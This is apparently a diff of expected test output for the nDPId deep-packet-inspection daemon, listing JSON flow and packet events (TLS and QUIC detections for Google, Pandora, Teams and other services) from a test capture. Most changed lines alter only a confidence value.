+00894{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":509,"source":"sites.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495836963,"flow_last_seen":1646495836983,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495836983,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.206","src_port":50608,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"googleplus.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00935{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":510,"source":"sites.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646495836963,"flow_last_seen":1646495837006,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646495837006,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.206","src_port":50608,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"googleplus.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":511,"source":"sites.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495837086,"flow_last_seen":1646495837086,"flow_idle_time":200000,"flow_min_l4_payload_len":1357,"flow_max_l4_payload_len":1357,"flow_tot_l4_payload_len":1357,"flow_avg_l4_payload_len":1357,"midstream":0,"thread_ts_msec":1646495837086,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.181.238","src_port":36832,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02265{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":511,"source":"sites.pcapng","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1646495837086,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1399,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1399,"pkt_l4_len":1365,"thread_ts_msec":1646495837086,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAVpAABAAEARLnPAqAGAjvq17o\/gAbsFVdqKwQAAAAEIGskra7CKZYEDuYLxAEIVFxxqmZ08lCd3LEamnRnTwqMewjQTOXHJ+bQBCnc75qyddTeYHQ3SnzAULSCTOvy9BuronZfx+Rok2NEb\/1BsWpwM7HvouqIbg\/UM9rh+Oz94fTVRKCbJSe1Rt9Wi3IS3cTWhF88qqkbPlVNVfTP6qf147kmXwAclEb200UQEzcAZIv3o++EPu3L79R8FmBpBYJnCKkgaxbqODau1mi\/955te0zmkf2846gwZzwMXzDwbr6\/3HnP3h8OfoVM0MIFN9x7Ds+vGpVKDRpQM0NlvNQfFfblQvgPKr6\/wJHgowwd40oBCNI3FTXFgafKbw2f8iXs1MuIi6dbw5qDMfDg7neN7v6\/vcX4HSf8y6PVeyxCvA4+7q957ap\/3PII07iu47YhDzCD0lwTDjfi\/a1raoLz70\/SPK9NEbeWnxibfZXFeg8+E6Qmd9DFP4zQ2QPKahjqlPM4ZePdB1N+sWTrGnHY+e5VOY4qYOyABuFGeuadAN35ZvnTav7s\/+rzxtiAo1AWyqO5W85hkYntoGdWyMOzcrhaGvKoJNlyQWa3gWJkpY39Z1uzVJ9G3lDdAsC9\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"} -00828{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":511,"source":"sites.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495837086,"flow_last_seen":1646495837086,"flow_idle_time":200000,"flow_min_l4_payload_len":1357,"flow_max_l4_payload_len":1357,"flow_tot_l4_payload_len":1357,"flow_avg_l4_payload_len":1357,"midstream":0,"thread_ts_msec":1646495837086,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.181.238","src_port":36832,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GooglePlus","breed":"Fun","category":"SocialNetwork"},"quic": {"client_requested_server_name":"plus.google.com","version":"TLSv1.3","alpn":"h3","ja3":"b719940c5ab9a3373cb4475d8143ff88","tls_supported_versions":"TLSv1.3"}} 
+00828{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":511,"source":"sites.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495837086,"flow_last_seen":1646495837086,"flow_idle_time":200000,"flow_min_l4_payload_len":1357,"flow_max_l4_payload_len":1357,"flow_tot_l4_payload_len":1357,"flow_avg_l4_payload_len":1357,"midstream":0,"thread_ts_msec":1646495837086,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.181.238","src_port":36832,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GooglePlus","breed":"Fun","category":"SocialNetwork"},"quic": {"client_requested_server_name":"plus.google.com","version":"TLSv1.3","alpn":"h3","ja3":"b719940c5ab9a3373cb4475d8143ff88","tls_supported_versions":"TLSv1.3"}} 02275{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":512,"source":"sites.pcapng","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1646495837102,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1399,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1399,"pkt_l4_len":1365,"thread_ts_msec":1646495837102,"pkt":"PKn0qB\/spJGxgjQ5CABFgAVpAABAADMROvOO+rXuwKgBgAG7j+AFVSXtyAAAAAEDuYLxCBrJK2uwimWBAEU4Tznrzq28hb1XmRDs0MFqelTnhcFUZ84H4q1aY4G8iO4oHDfc48pBHn\/VwFJa95gqSHvH4Ev8Om2dP0drKfHTm5RIabnMUwABEpNiK30Wb+s0DC1P8fJqrYirSkcMUtk+OScepXvvMoUJqb3oK\/SHueY\/CR+1r94ahlb+lQ5CMkRrFEpV8Y80c9Tk558ky1YvZroBJocv+D8x22dTrB3Nr2zV5BXUe4IfZjyM1uOvrGOzm7BFlSrMgOj6FKIkCgp\/pf+jrmIN6zoTCYHljLfpxOi3CtJlotE5kvBNJfYTIlpV6ePxOeaBHnLAnR8AUiLMe4EQhoCyafpPSu2uRilBt0zY24SPHj+Vr1q8JDD3+tdbrEpwnhqALSf4fMlI0nlCiW6KDCz9YYUL75K4IS9444yNzf1Yr99Mh0kbqbRkqVD2lz0sc+tejmla91jt2s1ymwqM2Dkc57wq\/ZGL2qTvHoCDCrWXzzSFq2DtMODbeFddKrW7D2S\/WC6gNpi8CkmnUEfrksPztXbMxr+4svM2m36IzD+uTDtBonQOeeetS42fSNmayHtkfbHFRhxhKIWxbXnDeYhaHVYjCQ+4X0zwkTVPladnLIcVEBYqwYQv5\/bz9ieX8wyoykaDLtE9CrJi2EKtZ8wkCC7Z741Zd+Wml1GFTEX8vTPcXOs4jWXGa8by36ak
7R21cVgtCbMzCsX51MXYO9rxKpqzQ90YL3ZJybESTLyCZVaetnFQQy0zj9i3aMbEeaF1GIY8fpv41LJIfBTcuddEsku5mHk0ET+hIJRQHhrqv3\/7dLCFIB8IbFzqoMNXvst3vFd153RNd4+wDFw0PTKp3WxAax7aH3o4vpIKkH5MYZZm6QdYg4AXeCOVs+yOQckfo449mppsZnBCauNFwyGHgfdImQc5ChUcBackKfZKPm+8gpfez3Lh5cIH5TVZfBcX2049yxCxwBIQNMHRFZ\/l6px98JrGqv9wlLvZ9x05f9o+OBwqtGjSma1n6CqkHTjCKDb9wEKbD27oXi\/IB1KPHp2u9d\/c+7X2RVtjWmizhI43eqsfAt6YQSI\/I6i5XWGJRa1qw\/6lLbvQvj\/jHqXTS68GWhBdBLJUtfTko6qCsN7rqu1qRzGoIhl0BkGE92lNyYY\/ZTU6\/hdcvPHH\/gVolLu3hFDPu+ipgvDDLIZuRl+UaoOI4gJccnN1m37oKsX6NQtnyeGSc2tM6+62ei3A6X8waSaElCusvteiUGCHQxwaHmAxN+l0Fnrtj2W9v8HqhbG8zavLaMSK9TCSurpq1GtTp5SAztNP1KCrvVnqVhJrjpPBsMoRZgIibHU+b02bSrZ5vLUq8fMRq1DHjSpmxuFXNZXv4gyNl3Dl6lhcF466Vu3DVIKOpmXUnOt94P9drBleL2pc6g\/Rsi+uKui90velUE0hGPgoOIhhDJ0ymy34LYnDdDZuGwprFKEAglwy2+YC1sXbba6gKVjcOV1Ca5zHuLIWZHit470RXXzr7m1Xi\/5cXZYyKSyJACVo6ge6ve+Upi7YI+aW+jgyPqmHMKb+I\/eIOcKZeHyih24R2l7AgjvcvMggC5W8nbNUSu9cpnGWdlPqjTB0D+d7oT5+bGyUabkzh3dJ2t9fzH8gnGtlT1zFzufTmcBCKpbCY6sP\/0lUq7vHjuvu650M0IhuYA8e9G78Y8vHGY8YN9zIOLD+CF2bDXHwqf3VW0Z0KdlLeLkOH0oqFJ9UgLOZLQqYMUReoZ97In3a7hJ65ZurIhpFxCeAoO9kMhJrGIJTN\/Ls9g=="} 00565{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":513,"source":"sites.pcapng","alias":"nDPId-test","packets-captured":513,"packets-processed":512,"total-skipped-flows":0,"total-l4-payload-len":233934,"total-not-detected-flows":0,"total-guessed-flows":4,"total-detected-flows":42,"total-detection-updates":47,"total-updates":0,"current-active-flows":10,"total-active-flows":46,"total-idle-flows":36,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":319,"global_ts_msec":1646568788171} 
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":513,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646568788171,"flow_last_seen":1646568788171,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646568788171,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":53978,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":513,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1646568788171,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646568788171,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8AQRAAEAGfpzAqAGA0FUontLaAbs4n4KKAAAAAKAC+vB1NgAAAgQFtAQCCArSjLpwAAAAAAEDAwc="} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":514,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1646568788337,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646568788337,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8Ke1AAPAGpbLQVSiewKgBgAG70tpN2CtOOJ+Ci6ASOQiNqgAAAgQFtAEDAwAEAggKXyXRHtKMunA="} 
01169{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":515,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1646568788341,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646568788341,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5AQZAAEAGfJ3AqAGA0FUontLaAbs4n4KLTdgrT4AYAfYOtAAAAQEICtKMuxtfJdEeFgMBAgABAAH8AwNyi5pZnYizmESRNRsWFzLDUgF4AIT\/tX3zYbufDRkzzyDMV\/FK528iuv6PxN\/1DD4BU1TMzFBPBIF01ZAvPFWIVwAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAQAA4AAAtwYW5kb3JhLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACBUk5TxRwMmI7m3PUpmyv2jiTq1G62x80KdY2tfOvxfVgAXAEEEr8O4oznU2jNZk5ZC+\/pUpJeqcDtGn2NikTZa2J69CfKpIdzohOHLj9fffI5zTez3ppU6JIFTO2\/VBVQmSVbRwwArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCLAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":515,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646568788171,"flow_last_seen":1646568788341,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646568788341,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":53978,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pandora","breed":"Fun","category":"Streaming"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pandora.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":516,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646568788171,"flow_last_seen":1646568788508,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646568788508,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":53978,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pandora","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pandora.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"7047b9d842ee4b3fba6a86353828c915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01231{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":518,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646568788171,"flow_last_seen":1646568788673,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3789,"flow_avg_l4_payload_len":631,"midstream":0,"thread_ts_msec":1646568788673,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":53978,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pandora","breed":"Fun","category":"Streaming"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pandora.com","server_names":"*.pandora.com,pandora.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"7047b9d842ee4b3fba6a86353828c915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=GeoTrust TLS RSA CA G1","subjectDN":"C=US, ST=California, L=Oakland, O=Pandora Media, LLC, CN=*.pandora.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"40:BB:03:6C:E8:D4:7C:D7:72:59:2F:8D:DB:4B:64:4F:8F:C4:EB:AF"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646495669804,"flow_last_seen":1646495669824,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.185.106","src_port":33664,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonVideo","breed":"Acceptable","category":"Video"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646495697787,"flow_last_seen":1646495697827,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.142","src_port":56458,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleDrive","breed":"Acceptable","category":"Cloud"}} 
-00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646495836963,"flow_last_seen":1646495837006,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.206","src_port":50608,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646568788171,"flow_last_seen":1646568788847,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4237,"flow_avg_l4_payload_len":529,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":53978,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pandora","breed":"Fun","category":"Streaming"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1646495710534,"flow_last_seen":1646495710610,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6845,"flow_avg_l4_payload_len":684,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.13","src_port":56836,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.MS_OneDrive","breed":"Acceptable","category":"Cloud"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1646495785326,"flow_last_seen":1646495785351,"flow_idle_time":200000,"flow_min_l4_payload_len":1357,"flow_max_l4_payload_len":1357,"flow_tot_l4_payload_len":2714,"flow_avg_l4_payload_len":1357,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"216.58.212.142","src_port":38642,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646495749875,"flow_last_seen":1646495750848,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":4556,"flow_avg_l4_payload_len":569,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"129.226.107.210","src_port":45014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.IFLIX","breed":"Fun","category":"Video"}} 
-00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1646495710343,"flow_last_seen":1646495710456,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6565,"flow_avg_l4_payload_len":729,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.81.118.91","src_port":33102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1646495837086,"flow_last_seen":1646495837102,"flow_idle_time":200000,"flow_min_l4_payload_len":1357,"flow_max_l4_payload_len":1357,"flow_tot_l4_payload_len":2714,"flow_avg_l4_payload_len":1357,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.181.238","src_port":36832,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GooglePlus","breed":"Fun","category":"SocialNetwork"}} 
-00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646495650748,"flow_last_seen":1646495650832,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4927,"flow_avg_l4_payload_len":615,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.113.194.132","src_port":57878,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646495488872,"flow_last_seen":1646495488890,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"15.160.39.187","src_port":45898,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleSiri","breed":"Acceptable","category":"VirtAssistant"}} +00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":515,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646568788171,"flow_last_seen":1646568788341,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646568788341,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":53978,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.Pandora","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pandora.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":516,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646568788171,"flow_last_seen":1646568788508,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646568788508,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":53978,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pandora","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pandora.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"7047b9d842ee4b3fba6a86353828c915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01231{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":518,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646568788171,"flow_last_seen":1646568788673,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3789,"flow_avg_l4_payload_len":631,"midstream":0,"thread_ts_msec":1646568788673,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":53978,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pandora","breed":"Fun","category":"Streaming"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pandora.com","server_names":"*.pandora.com,pandora.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"7047b9d842ee4b3fba6a86353828c915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=GeoTrust TLS RSA CA G1","subjectDN":"C=US, ST=California, L=Oakland, O=Pandora Media, LLC, CN=*.pandora.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"40:BB:03:6C:E8:D4:7C:D7:72:59:2F:8D:DB:4B:64:4F:8F:C4:EB:AF"}} 